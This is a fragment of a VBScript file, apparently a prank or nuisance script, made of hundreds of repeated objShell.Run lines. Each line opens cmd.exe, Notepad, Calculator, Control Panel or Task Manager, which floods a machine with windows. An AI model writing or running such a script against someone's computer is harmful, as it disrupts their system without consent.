objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
